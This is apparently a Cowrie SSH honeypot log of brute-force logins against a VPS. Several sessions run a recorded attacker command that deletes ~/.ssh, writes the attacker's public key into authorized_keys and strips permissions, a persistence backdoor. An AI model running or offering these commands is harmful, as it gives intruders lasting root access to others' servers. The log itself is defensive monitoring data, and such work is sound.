{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:54:59.837767Z","src_ip":"216.107.136.92","session":"ce437e84afa1"}
{"eventid":"cowrie.login.failed","username":"info","password":"test","message":"login attempt [info/test] failed","sensor":"my-vps","timestamp":"2025-09-08T19:55:00.240231Z","src_ip":"216.107.136.92","session":"ce437e84afa1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:55:01.332558Z","src_ip":"216.107.136.92","session":"ce437e84afa1"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":60862,"dst_ip":"1.2.3.4","dst_port":22,"session":"439e116e1b19","protocol":"ssh","message":"New connection: 77.75.56.63:60862 (1.2.3.4:22) [session: 439e116e1b19]","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.232061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.233005Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.270245Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.login.success","username":"root","password":"123456Abc","message":"login attempt [root/123456Abc] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.458903Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:55:12.597707Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.598513Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.600116Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.650956Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:55:12.740427Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.741100Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.783225Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.784075Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":60874,"dst_ip":"1.2.3.4","dst_port":22,"session":"2494628787a8","protocol":"ssh","message":"New connection: 77.75.56.63:60874 (1.2.3.4:22) [session: 2494628787a8]","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.817446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.818748Z","src_ip":"77.75.56.63","session":"2494628787a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:55:12.853734Z","src_ip":"77.75.56.63","session":"2494628787a8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T19:55:13.040329Z","src_ip":"77.75.56.63","session":"2494628787a8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:55:14.084428Z","src_ip":"77.75.56.63","session":"2494628787a8"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":60884,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f6c844bf036","protocol":"ssh","message":"New connection: 77.75.56.63:60884 (1.2.3.4:22) [session: 6f6c844bf036]","sensor":"my-vps","timestamp":"2025-09-08T19:55:14.130057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:55:14.132319Z","src_ip":"77.75.56.63","session":"6f6c844bf036"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:55:14.183337Z","src_ip":"77.75.56.63","session":"6f6c844bf036"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:55:14.331263Z","src_ip":"77.75.56.63","session":"6f6c844bf036"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:55:14.372305Z","src_ip":"77.75.56.63","session":"439e116e1b19"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:55:14.373109Z","src_ip":"77.75.56.63","session":"6f6c844bf036"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":52390,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f6a33e707de","protocol":"ssh","message":"New connection: 103.206.72.2:52390 (1.2.3.4:22) [session: 8f6a33e707de]","sensor":"my-vps","timestamp":"2025-09-08T19:56:03.720497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:56:03.724483Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:56:03.907176Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.login.success","username":"root","password":"Pp123456","message":"login attempt [root/Pp123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:56:04.654317Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:56:05.077061Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:56:05.077733Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:56:05.078566Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:05.264777Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:56:05.652201Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T19:56:05.652911Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T19:56:05.840515Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:05.841330Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":52500,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec8ce2c4822","protocol":"ssh","message":"New connection: 103.206.72.2:52500 (1.2.3.4:22) [session: 7ec8ce2c4822]","sensor":"my-vps","timestamp":"2025-09-08T19:56:06.000595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:56:06.001529Z","src_ip":"103.206.72.2","session":"7ec8ce2c4822"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:56:06.176387Z","src_ip":"103.206.72.2","session":"7ec8ce2c4822"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T19:56:06.910551Z","src_ip":"103.206.72.2","session":"7ec8ce2c4822"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:08.089313Z","src_ip":"103.206.72.2","session":"7ec8ce2c4822"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":52504,"dst_ip":"1.2.3.4","dst_port":22,"session":"56e08b6d04ce","protocol":"ssh","message":"New connection: 103.206.72.2:52504 (1.2.3.4:22) [session: 56e08b6d04ce]","sensor":"my-vps","timestamp":"2025-09-08T19:56:08.268256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:56:08.269022Z","src_ip":"103.206.72.2","session":"56e08b6d04ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:56:08.449392Z","src_ip":"103.206.72.2","session":"56e08b6d04ce"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:56:09.203074Z","src_ip":"103.206.72.2","session":"56e08b6d04ce"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:09.387785Z","src_ip":"103.206.72.2","session":"56e08b6d04ce"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:09.397614Z","src_ip":"103.206.72.2","session":"8f6a33e707de"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":32904,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d1bbab0bbd6","protocol":"ssh","message":"New connection: 77.75.56.63:32904 (1.2.3.4:22) [session: 2d1bbab0bbd6]","sensor":"my-vps","timestamp":"2025-09-08T19:56:18.819043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:56:18.828290Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
